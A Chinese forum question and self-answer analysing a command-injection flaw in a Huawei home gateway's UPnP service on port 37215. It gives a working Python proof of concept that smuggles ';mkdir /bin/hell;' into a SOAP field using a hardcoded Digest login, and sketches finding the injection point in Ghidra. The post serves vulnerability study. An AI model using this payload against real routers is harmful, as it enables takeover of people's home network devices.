路由器命令执行漏洞成因分析

头像JC · 提问于2021.08.23浏览量:647

payload如下:

 
 
 
  1. import requests
  2. headers = {
  3. "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
  4. }
  5. data = '''<?xml version="1.0" ?>
  6. <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  7. <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
  8. <NewStatusURL>;mkdir /bin/hell;</NewStatusURL>
  9. <NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
  10. </u:Upgrade>
  11. </s:Body>
  12. </s:Envelope>
  13. '''
  14. requests.post('http://192.168.3.2:37215/ctrlt/DeviceUpgrade_1',headers=headers,data=data)
全部回答 · 1
最新最热
  • 用户头像
    JC2021.08.23 17:08

    漏洞分析: 首先需要分析出这37215端口的应用程序【此处对应的程序为upnp】然后对该程序进行逆向。从POC中可以分析,注入点是在,通过在Ghidra中搜索该字符串,并查找交叉引用,找到目标函数。 (回答怎么没法贴图啊? 贴图不是更直观么)

热门问题